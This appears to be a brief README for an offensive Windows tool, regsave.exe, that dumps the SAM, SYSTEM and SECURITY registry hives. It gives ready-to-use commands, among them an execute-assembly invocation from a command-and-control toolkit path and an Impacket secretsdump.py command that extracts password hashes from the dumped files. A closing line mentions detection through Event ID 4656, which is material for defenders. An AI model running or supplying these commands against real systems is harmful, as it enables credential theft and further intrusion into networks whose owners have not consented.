A .NET 3.5 application that will dump SAM / SYSTEM / SECURITY registry keys to a path of your choosing.
regsave.exe c:\Users\USER\Appdata\Local execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local Collect the files and then parse them with Impacket secretsdump
secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL Look for Event ID 4656 after configuring audit policy.
More info at Detecting Attempts to steal passwords from the registry